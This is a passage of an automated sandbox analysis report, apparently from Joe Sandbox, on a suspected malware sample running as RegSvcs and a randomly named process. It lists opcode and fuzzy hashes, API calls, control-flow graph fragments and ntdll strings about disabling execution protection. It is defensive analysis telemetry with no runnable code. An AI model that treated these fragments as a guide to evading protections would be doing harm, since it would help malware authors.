                                                                                                              • Instruction Fuzzy Hash: 5390026160180403D144765848086070085A7D0312F59C411A2064955ECA698D516235
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ecea7384fd756249ad23f788594e76d777e8fadf130a5c4b885355a7d595d867
                                                                                                              • Instruction ID: 29d057ab39bb92cdd35a86d8b03c94b77e9a148133dd738c260234c8b0108f65
                                                                                                              • Opcode Fuzzy Hash: ecea7384fd756249ad23f788594e76d777e8fadf130a5c4b885355a7d595d867
                                                                                                              • Instruction Fuzzy Hash: 90900221A0140502D10572584408616008AA7D0251F99C422A1024955ECA658A92A231
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bc4f4907806136d721d7fa3c68661be19af7c30a1bb64dcb7f80f66371908708
                                                                                                              • Instruction ID: 527b2bb90c8e7c394b00546424f191cf278eddbc0f293f41837fd272af30c0ec
                                                                                                              • Opcode Fuzzy Hash: bc4f4907806136d721d7fa3c68661be19af7c30a1bb64dcb7f80f66371908708
                                                                                                              • Instruction Fuzzy Hash: E890027160140402D144725844087460085A7D0311F59C411A5064954EC6998ED56765
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3e1905da10e5895ff83613507b5903f69eda38a0e4087b8c07e58d807fc41fb9
                                                                                                              • Instruction ID: 4dc3d3c0073ed8cb0c2431772cc76f5ee1ca9d8f7a903f26b578bc639acfc31a
                                                                                                              • Opcode Fuzzy Hash: 3e1905da10e5895ff83613507b5903f69eda38a0e4087b8c07e58d807fc41fb9
                                                                                                              • Instruction Fuzzy Hash: A290022160184442D14473584808B0F4185A7E1212F99C419A4156954CC95589555721
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 649da0f443889af2913a3ac93838719f8fe661468e85d540e43584470d12ebdb
                                                                                                              • Instruction ID: 69ad77a13115d089e3f6199c3608b5703c1e450972c8e7acdb108fb93276f408
                                                                                                              • Opcode Fuzzy Hash: 649da0f443889af2913a3ac93838719f8fe661468e85d540e43584470d12ebdb
                                                                                                              • Instruction Fuzzy Hash: BF90022164140802D144725884187070086E7D0611F59C411A0024954DC6568A6567B1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 47d19593e3bc67ab661ff09d50629ce8afebeb6cba7d826b6da7c34762d2974c
                                                                                                              • Instruction ID: 4faadddc6727fd6f5711aaee08636664f3d859198d176a1d4deb48ea4b159a63
                                                                                                              • Opcode Fuzzy Hash: 47d19593e3bc67ab661ff09d50629ce8afebeb6cba7d826b6da7c34762d2974c
                                                                                                              • Instruction Fuzzy Hash: 2890022164545102D154725C44086164085B7E0211F59C421A0814994DC59589556321
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a7a943c25c87eeaa4e6abce30d379b29ecd79bcd9010e78749df2cb818aefbe5
                                                                                                              • Instruction ID: d1d5a9c644c7c2bef3a9778a3c46285d44ac53089c12027f0bba5b6335d82613
                                                                                                              • Opcode Fuzzy Hash: a7a943c25c87eeaa4e6abce30d379b29ecd79bcd9010e78749df2cb818aefbe5
                                                                                                              • Instruction Fuzzy Hash: 2090023560140402D5147258580864600C6A7D0311F59D811A0424958DC69489A1A221
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2ab8c271c863c3ffcff9e517406ffd049b7de69e8017a841861c27f431a17be0
                                                                                                              • Instruction ID: a9ce98f62f8b3cde2e656b803d8bf9b73bf5b96bd5a3f52db84c6eb0ea341389
                                                                                                              • Opcode Fuzzy Hash: 2ab8c271c863c3ffcff9e517406ffd049b7de69e8017a841861c27f431a17be0
                                                                                                              • Instruction Fuzzy Hash: 0B90023160240142954473585808A4E4185A7E1312B99D815A0015954CC95489615321
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction ID: c8a7568f676a18a8ae77a3c6076824ac5f56f67c71ba10dbc3ede338dba9dce1
                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 2c34eeb85fa7ab9545ba12a6ee022fead3561d39bcf34be95f473f3146655c99
                                                                                                              • Instruction ID: df23dc21eeb217cef10665139a51cf27273a1e9efddfd195031fa44906b3d727
                                                                                                              • Opcode Fuzzy Hash: 2c34eeb85fa7ab9545ba12a6ee022fead3561d39bcf34be95f473f3146655c99
                                                                                                              • Instruction Fuzzy Hash: EC51E8B1A04216BFCB25DB9CCC9097EFBF8BB48241B548169F495DB681D374DE4087E0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: ec157f387e55dd412c2b2492e034a8d7be05f2cdb5dceab7d9a99d61591218af
                                                                                                              • Instruction ID: d8db2cc935c04da8549c0d4b0bacd9880ed0dd0ebb3c32833c86eeddd5fda8ee
                                                                                                              • Opcode Fuzzy Hash: ec157f387e55dd412c2b2492e034a8d7be05f2cdb5dceab7d9a99d61591218af
                                                                                                              • Instruction Fuzzy Hash: 9651F475A00646AFCB24DF9CDCA097EBBF9EF44200B24845EF496D7681E7B4DA4087A0
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016046FC
                                                                                                              • Execute=1, xrefs: 01604713
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01604742
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01604725
                                                                                                              • ExecuteOptions, xrefs: 016046A0
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01604787
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01604655
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: e8a01bf11c799548d944be44f634e2dacafefcfe065c37610b6b6ee9e4c05f5a
                                                                                                              • Instruction ID: 785c176b1b668f34f1b48950a1252c830c4a8a00b4b28a004afc10c9a6e35368
                                                                                                              • Opcode Fuzzy Hash: e8a01bf11c799548d944be44f634e2dacafefcfe065c37610b6b6ee9e4c05f5a
                                                                                                              • Instruction Fuzzy Hash: 9651093160021A7EEF21AFE9EC86BAE77A8FF58700F04009DD605AF591DB709A458F54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction ID: 62a2f5bd9e791d3f37f57bc74a4f71877441a272246b05dbf944d6a515bebe55
                                                                                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction Fuzzy Hash: 9E021371508342AFD315CF19D890A6BBBE9FFC8704F448A6DF9898B264DB31E945CB42
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
Strings
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016002BD
• RTL: Re-Waiting, xrefs: 0160031E
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016002E7
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
Strings
• RTL: Re-Waiting, xrefs: 01607BAC
• RTL: Resource at %p, xrefs: 01607B8E
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01607B7F
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0160728C
Strings
• RTL: Re-Waiting, xrefs: 016072C1
• RTL: Resource at %p, xrefs: 016072A3
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01607294
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280

Execution Graph

Execution Coverage: 11.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 118
Total number of Limit Nodes: 11

Control-flow Graph
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,026ED786,?,?,?,?,?), ref: 026ED847
Strings
Memory Dump Source
• Source File: 00000009.00000002.1994568043.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_26e0000_STiokuWkiGFJ.jbxd
Similarity
• API ID: DuplicateHandle
• String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
• API String ID: 3793708945-1484464239

Control-flow Graph
APIs
• CreateActCtxA.KERNEL32(?), ref: 026E59C9
Memory Dump Source
• Source File: 00000009.00000002.1994568043.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_26e0000_STiokuWkiGFJ.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0

Control-flow Graph
APIs
• CreateActCtxA.KERNEL32(?), ref: 026E59C9
Memory Dump Source
• Source File: 00000009.00000002.1994568043.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_26e0000_STiokuWkiGFJ.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
                                                                                                              • Opcode ID: 4b7f79918b375fd266abf82443c37cd6c773848518f2f9472134567e6f6077e3
                                                                                                              • Instruction ID: 72fe58115247b5a97462937b04e07fcc4d45de6b9b79235be88c5209f01b9429
                                                                                                              • Opcode Fuzzy Hash: 4b7f79918b375fd266abf82443c37cd6c773848518f2f9472134567e6f6077e3
                                                                                                              • Instruction Fuzzy Hash: A041E2B0C01719CBDB24CFA9C98478DBBB6BF49308F24806AD419AB255DB75694ACF90

Control-flow Graph
control_flow_graph 762 4ccf2d8-4ccf2fd call 4ccc82c 765 4ccf2ff-4ccf30f call 4cc75b0 762->765 766 4ccf312-4ccf3a4 CreateIconFromResourceEx 762->766 770 4ccf3ad-4ccf3ca 766->770 771 4ccf3a6-4ccf3ac 766->771 771->770
Memory Dump Source
• Source File: 00000009.00000002.2018732985.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4cc0000_STiokuWkiGFJ.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
• Opcode ID: 08a667ffc1e0bb8ad58c9678b48bcccc8cd7250967dd8b88ca64a85ba5471d07
• Instruction ID: 6035e0fe2984cbb5c8cf9f88d49de60738423374235ace4fee718696901dd075
• Opcode Fuzzy Hash: 08a667ffc1e0bb8ad58c9678b48bcccc8cd7250967dd8b88ca64a85ba5471d07
• Instruction Fuzzy Hash: 6C3198B2900359DFCB01CFA9D844AEEBFF5EF09310F18805AE554AB261C335A950DFA0

Control-flow Graph
control_flow_graph 784 4ccd550-4ccd5a4 786 4ccd5af-4ccd5be 784->786 787 4ccd5a6-4ccd5ac 784->787 788 4ccd5c0 786->788 789 4ccd5c3-4ccd5fc DrawTextExW 786->789 787->786 788->789 790 4ccd5fe-4ccd604 789->790 791 4ccd605-4ccd622 789->791 790->791
APIs
• DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04CCD53D,?,?), ref: 04CCD5EF
Memory Dump Source
• Source File: 00000009.00000002.2018732985.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4cc0000_STiokuWkiGFJ.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: 09f895661848e89bbbdbbdfd160d25bfae27accea9a42557eeb00bbdaf82cd0d
• Instruction ID: fdf96cae6218771ec7744d17b32751e309965a876a2ef3a8f1949d6a455cac5f
• Opcode Fuzzy Hash: 09f895661848e89bbbdbbdfd160d25bfae27accea9a42557eeb00bbdaf82cd0d
• Instruction Fuzzy Hash: 6031E0B5D002499FDB10CF9AD884AEEFBF5FB48324F14842EE819A7210D774A945CFA4

Control-flow Graph
control_flow_graph 774 4ccc6e4-4ccd5a4 776 4ccd5af-4ccd5be 774->776 777 4ccd5a6-4ccd5ac 774->777 778 4ccd5c0 776->778 779 4ccd5c3-4ccd5fc DrawTextExW 776->779 777->776 778->779 780 4ccd5fe-4ccd604 779->780 781 4ccd605-4ccd622 779->781 780->781
APIs
• DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04CCD53D,?,?), ref: 04CCD5EF
Memory Dump Source
• Source File: 00000009.00000002.2018732985.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4cc0000_STiokuWkiGFJ.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: f5839bc9c8b358036721b390b855561dd6f76e0cab7883a3db937ffc23395970
• Instruction ID: 22230e2bf70e6b878d3724bb0e7accf02b7a42663f6a3b0848ce0bb35db7750a
• Opcode Fuzzy Hash: f5839bc9c8b358036721b390b855561dd6f76e0cab7883a3db937ffc23395970
• Instruction Fuzzy Hash: EA31C2B59002499FDB10CF9AD884AAEFBF5FB48314F14842EE919A7210D775A944CFA4

Control-flow Graph
control_flow_graph 794 26eb8d0-26ed854 DuplicateHandle 796 26ed85d-26ed87a 794->796 797 26ed856-26ed85c 794->797 797->796
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,026ED786,?,?,?,?,?), ref: 026ED847
Memory Dump Source
• Source File: 00000009.00000002.1994568043.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_26e0000_STiokuWkiGFJ.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 7658d3b732eebbc7de2e7930af72b47ceecb604a9d6d0362b00aeaf212421711
• Instruction ID: e56805a8bc94e91498779baf0da67fd736b0399a5b650fd3869f438ed49d429f
• Opcode Fuzzy Hash: 7658d3b732eebbc7de2e7930af72b47ceecb604a9d6d0362b00aeaf212421711
• Instruction Fuzzy Hash: F921E4B5901258DFDB10CF9AD984ADEFFF8EB48314F14802AE915A7350D374A950CFA4

Control-flow Graph
control_flow_graph 800 26ed7ba-26ed854 DuplicateHandle 801 26ed85d-26ed87a 800->801 802 26ed856-26ed85c 800->802 802->801
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,026ED786,?,?,?,?,?), ref: 026ED847
Memory Dump Source
• Source File: 00000009.00000002.1994568043.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_26e0000_STiokuWkiGFJ.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: c1276af34c50520402028f33c50a006a7c0d7da58f57b2214e11f16d43705f2c
• Instruction ID: 5f7e1bd94c864ed81064965ff705713ba146d1fec7ca75d6763f4f1efd679ced
• Opcode Fuzzy Hash: c1276af34c50520402028f33c50a006a7c0d7da58f57b2214e11f16d43705f2c
• Instruction Fuzzy Hash: 2D21E4B5D012589FDB10CF9AD584ADEFFF8EB48324F14801AE918A7310D374A950CFA5

Control-flow Graph
control_flow_graph 805 4ccc82c-4ccf3a4 CreateIconFromResourceEx 807 4ccf3ad-4ccf3ca 805->807 808 4ccf3a6-4ccf3ac 805->808 808->807
APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,04CCF2F2,?,?,?,?,?), ref: 04CCF397
Memory Dump Source
• Source File: 00000009.00000002.2018732985.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4cc0000_STiokuWkiGFJ.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
• Opcode ID: 751a4b6fc4cbd9e653748ee027f8b6cb855e5c6865b0627dc65283021c89445e
• Instruction ID: d5ef13e4aa46c542d8f1664a4c03e83487510d022ac2b3bd8119a7122eb54085
• Opcode Fuzzy Hash: 751a4b6fc4cbd9e653748ee027f8b6cb855e5c6865b0627dc65283021c89445e
• Instruction Fuzzy Hash: 881179B1900359DFDB10CFAAC844BDEBFF9EB48320F14841AE954A7250C375A990DFA4
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 026EB13E
Memory Dump Source
• Source File: 00000009.00000002.1994568043.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_26e0000_STiokuWkiGFJ.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 1329c4b7a20c75f73ef022476f2152fe21387fcdb4d4dc921d645b6d2b71fc8d
• Instruction ID: b5a70596fcd2f9582f37e41f5ba7c04efd5e9fa41d788c82e79ac08470a755a9
• Opcode Fuzzy Hash: 1329c4b7a20c75f73ef022476f2152fe21387fcdb4d4dc921d645b6d2b71fc8d
• Instruction Fuzzy Hash: 2F1110B5D002498FDB10CF9AD948ADEFBF4AB88328F10842AD419A7310C379A545CFA5
Memory Dump Source
• Source File: 00000009.00000002.1977391889.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_bcd000_STiokuWkiGFJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 29ae7015d19414b7ca5ceacde8855245037f9e3ca3706c69e64fa96a5f558e10
• Instruction ID: 8c9482e0b17bd6c56232f62d161a9252639bc54a20238192a91cce5ec9edd7db
• Opcode Fuzzy Hash: 29ae7015d19414b7ca5ceacde8855245037f9e3ca3706c69e64fa96a5f558e10
• Instruction Fuzzy Hash: 3221E279500204DFDB09DF14D9C0F26BBA5EB94314F20C5BDDA094A356C336E856C6A1
Memory Dump Source
• Source File: 00000009.00000002.1977391889.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_bcd000_STiokuWkiGFJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 39732b945dd67b958b442858bdf7adee64ef96317f651cdac3bcdd27955a7c7f
• Instruction ID: b1066410811addfe0a1018dc74f80c48c6338c28ea983c446dd369c3f280bc0a
• Opcode Fuzzy Hash: 39732b945dd67b958b442858bdf7adee64ef96317f651cdac3bcdd27955a7c7f
• Instruction Fuzzy Hash: 6A210379500240DFDB05DF14D9C0F2ABFA5FBA8318F20C5BDE9094B256C336D856CAA1
Memory Dump Source
• Source File: 00000009.00000002.1990019617.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_248d000_STiokuWkiGFJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7f680026d3247cd461e6c911fe71b546fe425eaaff8020006ba080a2154cdf57
• Instruction ID: e38f0a0b5cde9a08a9b03257f2dc1af699010ce99e6b82e0efd275bc8e26a273
• Opcode Fuzzy Hash: 7f680026d3247cd461e6c911fe71b546fe425eaaff8020006ba080a2154cdf57
• Instruction Fuzzy Hash: 5D212271A04200DFDB14EF24D984B2ABBA5EB85318F20C56AD80A4B396C33AD447CA61
Memory Dump Source
• Source File: 00000009.00000002.1990019617.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_248d000_STiokuWkiGFJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 07260306703fd297e4e92622ef1f0d3ed446911c66841b0dd8a88e068002446a
• Instruction ID: 929e589835c26a2b4e12fd270e0bbbe0a31d0d374f686ee0803a8a38a7006208
• Opcode Fuzzy Hash: 07260306703fd297e4e92622ef1f0d3ed446911c66841b0dd8a88e068002446a
• Instruction Fuzzy Hash: EE210771914204DFDB05EF24D9C0B2ABBA5FB84314F20C66ED8094F395C336D446CA62
Memory Dump Source
• Source File: 00000009.00000002.1990019617.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_248d000_STiokuWkiGFJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e331ce7d9fb866c2112109b87e3284d045fa57ef14710fa5f7ec2502562be9db
• Instruction ID: 92237f12469ea84ca6e711cbeaf2e7bc6f66a7914e9364822ae68e4c3da0847c
• Opcode Fuzzy Hash: e331ce7d9fb866c2112109b87e3284d045fa57ef14710fa5f7ec2502562be9db
• Instruction Fuzzy Hash: 72218075509380CFDB02DF24D594716BF71EB46218F28C5DBD8498F2A7C33A940ACB62
Memory Dump Source
• Source File: 00000009.00000002.1977391889.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_bcd000_STiokuWkiGFJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
